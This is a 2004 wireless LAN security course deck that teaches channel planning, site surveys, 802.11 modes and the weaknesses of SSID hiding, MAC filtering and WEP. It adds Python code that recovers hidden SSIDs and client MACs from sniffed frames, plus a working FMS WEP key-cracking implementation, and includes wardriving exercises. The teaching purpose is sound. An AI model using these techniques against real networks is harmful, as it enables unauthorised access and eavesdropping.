Wireless Security Part 1 3/10/04 Mark Lachniet, Analysts International
Introductions • Mark Lachniet, Technical Director of Analyst International’s Security Services Group • Technical lead for service development, methodology, quality control, technical presales • Certified Information Systems Auditor (CISA) from ISACA • Certified Information Systems Security Professional (CISSP) from ISC^2 • Linux LPIC-1, Novell Master CNE, Microsoft MCSE, Checkpoint CCSE, TruSecure ICSA, etc. • Former I.T. director of Holt Public Schools • Frequent speaker for local organizations
Agenda • Overview of Wireless • Wireless frequency types and products • Controlling signal and site surveys • Wireless modes of operation • Wardriving and Warchalking • Basic wireless security features • Advanced wireless security features • Wireless in the network environment • Conclusions • Discussion
Class Logistics • Frequent breaks, maybe not 20 mins. • I do not mind if you mess around with your computers while I am talking, in fact I encourage it - you are here because you want to be • Will attempt to do more hands-on exercises and less talking • Please speak up! This will be most useful if you ask questions! Don’t wait for the end • Consider finding a partner, especially one of a higher or lower technical skill level
Class CD-ROM • I have included a CD-ROM with many tools and utilities on it • Some of these we will use, some of them we may not • Most are 30-day expiring demos • You should go to the web site(s) yourself and download the software, so you can get registered
Why Wireless? • Flexibility • Instructional Potential (mobile labs, data collection, research in common areas, etc.) • Overcome building limitations (all brick, asbestos, leased buildings, etc.) • Ubiquitous technology - built into many PDAs and Laptops • In use in many homes, coffee shops, airports • Many people already have it on their laptop, making it easy for visits, ad-hoc meetings
Why Not Wireless • Speed considerations (11 Mb/s or 54 Mb/s theoretical rate; actual throughput is much lower) • Security, both real and perceived, and especially the cost of the supporting security infrastructure • Signal interference from other devices • Signal penetration problems through dense materials • Changing technologies and standards • A little bit too much “fun” for bored students to hack
Wireless Technology • Wireless, and especially wireless security, operates at many different levels in many different ways • For the purposes of our class, we will start with the most basic elements of wireless technology (hardware) and work our way up to the most complex (applications) • One of the best representations of this type of abstraction is the OSI model
The OSI Model • The OSI Model is used to describe different layers of networks and network services • Layers 1 and 2 are the “hardware” level, but in our case there are no wires, only radio signals; 802.11 association and link encryption (WEP, WPA) also live at layer 2 • Layers 3 and 4 are TCP/IP, which a wireless Access Point / router may handle (DHCP, NAT, routing)
Types of Wireless • Let’s focus first on the lowest levels of the OSI model: frequencies and transmission techniques • 802.11 radios use a few physical-layer techniques: • Frequency Hopping Spread Spectrum (FHSS) • Direct Sequence Spread Spectrum (DSSS) • Orthogonal Frequency Division Multiplexing (OFDM) • FHSS is used in older Proxim cards, industrial applications, barcode scanners, etc. • DSSS is the most common type, used in most 802.11b WLAN cards, access devices, etc. • OFDM is used in modern 54 Mb/s devices (802.11a/g)
Direct Sequence Spread Spectrum • A high-rate pseudo-random “chipping” code spreads each data bit across a wide band • Produces a signal centered on the carrier frequency (about 22 MHz wide for 802.11b)
Frequency Hopping Spread Spectrum • A code sequence determines the order of “hops” between many narrow channels • Averaged over time, the energy is flat across the whole band
Orthogonal Frequency Division Multiplexing • Uses multiple carrier waves on different frequencies • Each wave carries part of the message • Used for 54 Mb/s applications (802.11a/g) • Each subcarrier can be modulated in several ways (BPSK, QPSK, 16-QAM, 64-QAM), which is where the different data rates come from
Wireless Types and Frequencies • Frequencies: • 802.11b and 802.11g are both 2.4 GHz • 802.11a is 5 GHz • Bandwidth • The 5 GHz space has more bandwidth (throughput speed capability) • Non-Overlapping Channels (the count may not match what your APs offer) • 802.11b/g @ 2.4 GHz has 3 (1, 6 and 11 in the US) • 802.11a @ 5 GHz has at least 8 (4 in each of the lower UNII bands; 12 in the US including UNII-3), and none of them overlap • Compatibility • 802.11g is usually backwards compatible with 802.11b, but b clients connect @ 11 Mb/s only • 802.11a isn’t compatible with either, since it uses a different band
Interference / Penetration / Leakage • Managing your signal is an important part of wireless security • If you can control your signal, keeping it mostly inside, you can worry less about hackers outside of your building • At the same time, you want to make sure you can reach all important areas of your building • You also need to be aware of interference from 2.4 GHz cordless phones, microwave ovens, Bluetooth devices, neighboring WLANs, etc. • Use non-overlapping channels wisely • The best way to make these determinations is by doing a site survey
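As an added example (not part of the original slides), the following Python checks a channel plan against the 2.4 GHz overlap rule behind the “3 non-overlapping channels” figure. The channel centers (2407 + 5 × n MHz, channel 14 at 2484) and the 22 MHz DSSS signal width are the real 802.11b numbers; the building plan (gym, library, office) and its channel assignments are constructed for the example.

```python
import itertools


def center_mhz(channel):
    """Center frequency of a 2.4 GHz 802.11b/g channel; channel 14 (Japan only) is the outlier."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError(f"not a 2.4 GHz channel: {channel}")


def overlaps(ch_a, ch_b, width_mhz=22):
    """Two channels overlap when their centers are closer than the signal width (22 MHz for 802.11b DSSS)."""
    return abs(center_mhz(ch_a) - center_mhz(ch_b)) < width_mhz


def largest_non_overlapping(channels, width_mhz=22):
    """Brute-force the largest set of mutually non-overlapping channels (how the '3 channels' figure arises)."""
    channels = list(channels)
    for size in range(len(channels), 0, -1):
        for combo in itertools.combinations(channels, size):
            if all(not overlaps(a, b, width_mhz) for a, b in itertools.combinations(combo, 2)):
                return combo
    return ()


def check_plan(ap_channels, width_mhz=22):
    """Return the AP pairs whose channels overlap; ap_channels maps AP name -> channel number."""
    return [(a, b)
            for (a, ch_a), (b, ch_b) in itertools.combinations(sorted(ap_channels.items()), 2)
            if overlaps(ch_a, ch_b, width_mhz)]


# Constructed plan for the building in the slides: the library AP sits on channel 3, too close to the gym's 1.
PLAN = {"gym": 1, "library": 3, "office": 11}

if __name__ == "__main__":
    print("US 2.4 GHz, 802.11b:", largest_non_overlapping(range(1, 12)))
    print("conflicts in plan:", check_plan(PLAN))
```

largest_non_overlapping(range(1, 12)) returns (1, 6, 11); with channel 14 available (Japan) it returns four. Passing width_mhz=20 for the narrower 802.11g OFDM signal over the 13 European channels reports four (1, 5, 9, 13), a plan some sites use; treat that as the optimistic figure, since the spectral masks still bleed into the neighbors.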
Performing a Site Survey • The Site Survey Toolkit • One or more access points • Various antennas and cables • Various WLAN NIC cards • Measuring wheel (“distance roller thingy”) • Tape, ZIP ties, etc. • One or more people • May need walkie-talkies • Keep people away from the equipment
Performing a Site Survey • Attempt to find the best configuration of WLAN equipment by setting it up and measuring signal • Use a blueprint or floor layout map of the target area • Use the measuring wheel to determine distance • Measure signal characteristics at various locations to develop a signal coverage map • Use the exact hardware that will be installed • Look at signal strength, signal to noise ratios, and access ranges at specific speeds • Consider potential usage: 5 users @ 54 Mb/s or 20 users @ 11 Mb/s? (lock wireless cards at that speed, and map with this in mind)
Use Built In Tools w/ Laptop • Analyze signal strength and signal to noise ratio using a client utility (passive mode) • Lock your card at a specific speed and just walk away until it stops working • Use the client utility to generate a large number of packets and see how many arrive correctly (active mode)
Install AP and Measure Speed • For example, place it more or less in the middle of the Gym - in this case there is a signal problem in the Library
Directional Antennas • A directional antenna may help direct signal & stop leaks
Wireless Components • The most common type of Wireless Local Area Network (WLAN) infrastructure typically involves two components • An Access Point, which works as a kind of “smart hub” to allow communication • A Client, which is typically a laptop, desktop or PDA with a wireless NIC • Within this paradigm are any number of different products, technologies or variations • The base standard for wireless LAN is 802.11, as determined by the IEEE: http://grouper.ieee.org/groups/802/11/index.html
Ad-Hoc Mode • In Ad-Hoc mode, all devices can talk to each other directly (if they are in range and on the same channel) • Relatively uncommon; used for small peer-to-peer configurations, LAN games, impromptu meetings, etc. • Referred to as an Independent Basic Service Set (IBSS)
Ad-Hoc Mode Definition • http://www.webopedia.com/TERM/A/ad_hoc_mode.html • “An 802.11 networking framework in which devices or stations communicate directly with each other, without the use of an access point (AP). Ad-hoc mode is also referred to as peer-to-peer mode or an Independent Basic Service Set (IBSS). Ad-hoc mode is useful for establishing a network where wireless infrastructure does not exist or where services are not required.”
Infrastructure Mode • The most common type of WLAN is the infrastructure Mode - used most places • All devices talk to the access point • Referred to as a Basic Service Set (BSS).
Infrastructure Mode Definition • http://www.webopedia.com/TERM/I/infrastructure_mode.html • “An 802.11 networking framework in which devices communicate with each other by first going through an Access Point (AP). In infrastructure mode, wireless devices can communicate with each other or can communicate with a wired network. When one AP is connected to wired network and a set of wireless stations it is referred to as a Basic Service Set (BSS). An Extended Service Set (ESS) is a set of two or more BSSs that form a single subnetwork. Most corporate wireless LANs operate in infrastructure mode because they require access to the wired LAN in order to use services such as fileservers or printers.”
Advanced Infrastructure Mode • There may be multiple access points in an environment • This raises a number of issues, including mobile clients • Comprised of multiple BSS’ to create an Extended Service Set (ESS)
Extended Service Set • Uses an ID of up to 32 characters to name the ESS, known as the ESSID (or just SSID), such as “USR8054” • This essentially represents “the network” and is something all users must have configured in some way
SSID Example • For example, this is how it looks on a USR8054 • Note the ability to turn off the broadcast of the SSID
Wardriving • One popular hobby for geeks is to “war drive” for wireless networks • Using special software such as Net Stumbler, drive or walk around looking for access points, frequently “chalking” them and/or recording the location with a GPS (then uploading coordinates to the Internet) • http://www.netstumbler.com • Passive scanners just listen for the beacon frames APs send (and any other traffic) without transmitting anything • Active scanners such as Net Stumbler send probe requests and log the responses • Scanners will usually tell you if advanced security (encryption) is configured • Some will even tell you about connected clients
Wardriving Resources • http://Michiganwireless.org • http://Netstumbler.com • http://www.wardriving.com • http://www.wigle.net/ (locations) • http://packetstormsecurity.org/wireless • search Google for ‘war drive’ :)
Activity #1: War Driving • Install a Lucent Wavelan / Orinoco card in your laptop • Install Net Stumbler from your CD-ROM • Run the application, observe the local network • Survey the facilities (?) and win a prize?
Activity #2: Protocol Analyzer • Install WinPCap • Reboot • Install Ethereal on your laptop • Associate with the access point (it may complain about it being insecure, that is OK) • Run Ethereal
Basic Wireless Security Features • There are a number of basic wireless security features and protocols: • Utilize static IP addresses • SSID Security (not broadcasting SSID) • MAC Address Filtering • WEP Encryption • Signal control and speed locking • 802.1X Authentication / Encryption • WPA Authentication / Encryption • External security (VPN, VLAN, or other things not part of wireless per se)
Utilize Static IP • Although it won’t stop a hacker with a protocol analyzer (the address range is visible in sniffed traffic), using static IP address assignment instead of DHCP helps a little • It stops the casual hacker from automatically getting an IP address and being allowed to surf • It creates a management burden, as each laptop must be uniquely identified ahead of time • It also creates an opportunity: since every address maps to a known machine, you can easily tell what a given user is doing on the network
SSID Broadcasting • For an extremely minimal amount of security, you can turn off SSID broadcasting • The AP still sends beacons; only the name field in them is blanked, so someone must know or discover the SSID in order to use the access point • The SSID can be recovered by watching another user’s traffic, since probe and association frames carry it in the clear • Active scanners may find it through a brute-force SSID scan (rare) • Windows may “remember” the AP/SSID
Activity #3: SSID Broadcast • Now that I have turned off SSID Broadcast, disassociate with the AP • Stop and restart Net Stumbler • Is the access point still visible? • Can you connect to it anyway through windows by manually typing in the SSID? • The SSID: USR8054
MAC Address Filtering • Each network device has a unique hardware identifier built into it, called a MAC address • In Windows, use ‘ipconfig /all’ to view the current MAC address of your devices • This can be used for security purposes
Problems with MAC Filtering • Although MAC addresses are burned into the hardware, most drivers let you override the address in software • Thus, a hacker only has to sniff enough traffic to learn an “allowed” MAC address (client addresses are sent in the clear, even with WEP on), and then impersonate it • MAC address filtering can also be very painful to manage in the long haul: • How do you keep track of all the addresses? • What about traveling users and visitors? • What is the maximum number of MAC addresses your access point will let you enter?
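As an added example covering both the SSID-hiding and the MAC-filtering slides (this is not code from the slides or from any wardriving tool), the Python below parses constructed 802.11 frames the way a passive sniffer would: it notices a beacon whose SSID element is blank, recovers the name from the next association request, and collects the MAC addresses of stations exchanging data with the AP. The header layout, frame types and SSID information element are the real 802.11 formats; the BSSID, the client MACs and the SSID (“USR8054”, from the slides) are made up, the frames carry no FCS, and a real capture would come from a monitor-mode card rather than from sample_capture().

```python
import struct

MGMT, DATA = 0, 2                                        # 802.11 frame types
ASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0, 4, 5, 8    # management subtypes used here
SSID_IE = 0                                              # information element tag for the SSID
BCAST = b"\xff" * 6


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def header(ftype, subtype, flags, addr1, addr2, addr3, seq=0):
    """24-byte 802.11 MAC header: frame control, duration, three addresses, sequence control."""
    frame_control = struct.pack("<BBH", (subtype << 4) | (ftype << 2), flags, 0)
    return frame_control + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4)


def ie(tag, value):
    return bytes([tag, len(value)]) + value


def parse_ies(buf):
    """Tag / length / value information elements following the fixed fields of a management frame."""
    ies, off = {}, 0
    while off + 2 <= len(buf):
        tag, length = buf[off], buf[off + 1]
        ies[tag] = buf[off + 2:off + 2 + length]
        off += 2 + length
    return ies


def parse(frame):
    """Minimal 802.11 parser; these constructed frames have no trailing 4-byte FCS."""
    fc0, flags, _duration = struct.unpack_from("<BBH", frame, 0)
    info = {"type": (fc0 >> 2) & 3, "subtype": fc0 >> 4, "to_ds": flags & 1, "from_ds": (flags >> 1) & 1,
            "addr1": frame[4:10], "addr2": frame[10:16], "addr3": frame[16:22]}
    fixed_len = {BEACON: 12, PROBE_RESP: 12, ASSOC_REQ: 4, PROBE_REQ: 0}
    if info["type"] == MGMT and info["subtype"] in fixed_len:
        info["ies"] = parse_ies(frame[24 + fixed_len[info["subtype"]]:])
    return info


def analyze(frames, bssid):
    """What a passive listener learns about one AP: hidden SSID or not, the SSID anyway, and client MACs."""
    names = {ASSOC_REQ: "association request", PROBE_REQ: "probe request", PROBE_RESP: "probe response"}
    report = {"beacon_hides_ssid": False, "ssid": None, "revealed_by": None, "clients": set()}
    for frame in frames:
        p = parse(frame)
        if p["type"] == MGMT:
            ssid = p.get("ies", {}).get(SSID_IE, b"").strip(b"\x00")
            if p["subtype"] == BEACON and p["addr2"] == bssid and not ssid:
                report["beacon_hides_ssid"] = True       # zero-length / NUL-filled SSID = "broadcast off"
            elif p["subtype"] in names and ssid and bssid in (p["addr1"], p["addr2"]) and report["ssid"] is None:
                report["ssid"], report["revealed_by"] = ssid.decode(errors="replace"), names[p["subtype"]]
        elif p["type"] == DATA:
            if p["to_ds"] and not p["from_ds"] and p["addr1"] == bssid:
                report["clients"].add(mac_str(p["addr2"]))   # station -> AP: addr2 is the client
            elif p["from_ds"] and not p["to_ds"] and p["addr2"] == bssid:
                report["clients"].add(mac_str(p["addr1"]))   # AP -> station: addr1 is the client
    return report


# Constructed capture: an AP with SSID broadcast off, two clients, and a wired host behind the AP.
BSSID = mac("02:00:00:aa:bb:01")
CLIENT_A, CLIENT_B, WIRED = mac("02:00:00:11:22:33"), mac("02:00:00:44:55:66"), mac("02:00:00:77:88:99")
SNAP = bytes([0xAA, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00])   # LLC/SNAP header that starts every data payload
RATES = ie(1, bytes([0x82, 0x84, 0x8B, 0x96]))          # supported rates 1/2/5.5/11 Mb/s


def sample_capture():
    beacon_body = struct.pack("<QHH", 0, 100, 0x0011) + ie(SSID_IE, b"") + RATES
    assoc_body = struct.pack("<HH", 0x0011, 10) + ie(SSID_IE, b"USR8054") + RATES
    return [
        header(MGMT, BEACON, 0, BCAST, BSSID, BSSID) + beacon_body,
        header(DATA, 0, 0b01, BSSID, CLIENT_A, WIRED) + SNAP + b"payload",      # ToDS: client A talking to the AP
        header(DATA, 0, 0b10, CLIENT_B, BSSID, WIRED) + SNAP + b"payload",      # FromDS: AP delivering to client B
        header(MGMT, ASSOC_REQ, 0, BSSID, CLIENT_A, BSSID) + assoc_body,        # client A (re)joins: names the SSID
    ]


if __name__ == "__main__":
    print(analyze(sample_capture(), BSSID))
```

The beacon with a zero-length SSID element is what “broadcast off” looks like on the air: the AP itself is plainly visible, only its name is blank, and the first association request from a client hands the name over. Any data frame to or from the BSSID yields a client MAC that a MAC filter would accept; 802.11 headers are never encrypted, so turning on WEP does not change this.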
Activity #4: MAC Filtering • I will now configure the AP to only allow my own MAC • Try not to lock yourself out of your AP :)
WEP Encryption • To get around the various wireless security problems, an early solution was WEP (Wired Equivalent Privacy) • This lets you configure a 40-bit or 104-bit key to encrypt traffic (marketed as “64-bit” and “128-bit”, because the 24-bit IV is counted in) • A WEP key is essentially a shared password • Normally, the same WEP keys are manually programmed into the client and access point • If the WEP keys match, the devices can communicate • WEP encryption is better than nothing but it still has its problems
WEP Encryption Problems • First of all, the WEP key must be stored on the client computer (or typed in each time) • Thus, the security of the client workstation(s) is very important • It might be possible to steal the WEP key from the registry or some configuration file • Also, WEP adds a small amount of processing overhead (less when the card does it in hardware) • Most importantly, the WEP implementation is flawed and WEP encryption can be cracked!
Cracking WEP • Software such as AirSnort (http://airsnort.shmoo.com/) lets you monitor encrypted wireless traffic and eventually gather enough information to crack the WEP key • The problem is WEP’s flawed use of the RC4 stream cipher • Specifically, while the packet body is encrypted, a plaintext 24-bit “Initialization Vector” (IV) is sent with each packet and prepended to the secret key to form the RC4 key • Certain IV values (“weak IVs”) set up the RC4 key schedule so that the first keystream byte leaks one byte of the secret key (the Fluhrer, Mantin and Shamir attack), and that keystream byte is visible because the first plaintext byte is always the LLC/SNAP value 0xAA • Given enough packets, 5-10 million, AirSnort can crack the WEP key
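As an added example (this is not AirSnort’s code, nor anything from the slides), the Python below carries out the weak-IV attack just described against a simulated capture: it implements RC4 and WEP framing, votes for each key byte from the frames whose IV satisfies the FMS “resolved” condition, and confirms the result by checking a frame’s CRC-32 ICV. The 40-bit key, the ARP-sized payload and the capture itself are constructed; simulated_capture() simply hands the attacker one frame for every weak IV of the form (A+3, 255, X), whereas a real sniffer waits for those to turn up among millions of frames. The one fact taken from real traffic is the known first plaintext byte 0xAA.

```python
import zlib
from collections import Counter

SNAP_FIRST_BYTE = 0xAA   # every 802.11 data payload starts with LLC/SNAP 0xAA: known plaintext for the attacker


def ksa(key, steps=256):
    """RC4 key scheduling; steps < 256 returns the partial state the FMS attack reasons about."""
    S, j = list(range(256)), 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_stream(key, n):
    """First n keystream bytes of RC4 under key (the PRGA)."""
    S, _ = ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret, iv, plaintext):
    """WEP frame body: 3-byte cleartext IV, key-index byte, then RC4(IV || secret) XOR (data || CRC-32 ICV)."""
    data = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    keystream = rc4_stream(iv + secret, len(data))
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(data, keystream))


def wep_decrypt(secret, frame):
    """Plaintext if the ICV verifies under secret, else None; this doubles as the attacker's final key check."""
    iv, body = frame[:3], frame[4:]
    data = bytes(a ^ b for a, b in zip(body, rc4_stream(iv + secret, len(body))))
    plain, icv = data[:-4], data[-4:]
    return plain if zlib.crc32(plain).to_bytes(4, "little") == icv else None


def fms_votes(frames, known):
    """Vote for secret byte A = len(known), using only frames whose IV leaves the KSA 'resolved'."""
    A, votes = len(known), Counter()
    for frame in frames:
        S, j = ksa(frame[:3] + known, A + 3)             # first A+3 KSA steps depend only on IV + known bytes
        if S[1] < A + 3 and S[1] + S[S[1]] == A + 3:     # FMS resolved condition: 1st output byte ~ S[A+3]
            out = frame[4] ^ SNAP_FIRST_BYTE             # first ciphertext byte XOR known plaintext = keystream
            votes[(S.index(out) - j - S[A + 3]) & 0xFF] += 1   # right about 5% of the time, noise otherwise
    return votes


def fms_recover(frames, keylen, known=b"", width=5):
    """Depth-first search over the top `width` candidates per byte; a frame's ICV decides each leaf."""
    if len(known) == keylen:
        return known if wep_decrypt(known, frames[0]) is not None else None
    for cand, _ in fms_votes(frames, known).most_common(width):
        hit = fms_recover(frames, keylen, known + bytes([cand]), width)
        if hit is not None:
            return hit
    return None


SECRET = bytes.fromhex("2b7e151628")   # constructed 40-bit ("64-bit") WEP key


def simulated_capture(secret=SECRET, keylen=5):
    """Constructed capture: one frame per weak IV (A+3, 255, X); real traffic yields these only rarely."""
    payload = bytes([0xAA, 0xAA, 0x03, 0, 0, 0, 0x08, 0x06]) + b"\x00" * 28   # ARP-sized LLC/SNAP payload
    return [wep_encrypt(secret, bytes([A + 3, 255, X]), payload)
            for A in range(keylen) for X in range(256)]


if __name__ == "__main__":
    recovered = fms_recover(simulated_capture(), 5)
    print("recovered:", recovered.hex() if recovered else None, "correct:", recovered == SECRET)
```

Only about one IV in 65,000 falls into a weak class for a given key byte, which is where the 5-10 million packet figure comes from; each weak IV then points at the right byte only about one time in twenty, so the attack counts votes and, as above, backtracks over the runners-up until a candidate key makes a frame’s ICV check out.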